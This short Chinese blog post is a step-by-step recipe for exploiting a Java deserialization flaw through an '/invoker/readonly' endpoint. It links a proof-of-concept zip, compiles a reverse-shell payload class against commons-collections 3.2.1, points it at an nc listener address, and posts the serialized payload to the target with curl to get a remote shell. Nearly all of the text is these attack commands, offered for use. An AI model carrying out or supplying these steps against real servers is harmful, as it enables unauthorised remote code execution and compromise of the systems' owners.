http://qq1.ltd/wp-content/uploads/2017/11/JavaDeserH2HC.zip

poc下载地址

漏洞判断是否存在

步骤1:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

步骤2:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java ip:port (nc监听IP及端口)

步骤3

curl http://xxxxx:81/invoker/readonly –data-binary @ReverseShellCommonsCollectionsHashMap.ser

反弹即可

发表评论

电子邮件地址不会被公开。 必填项已用*标注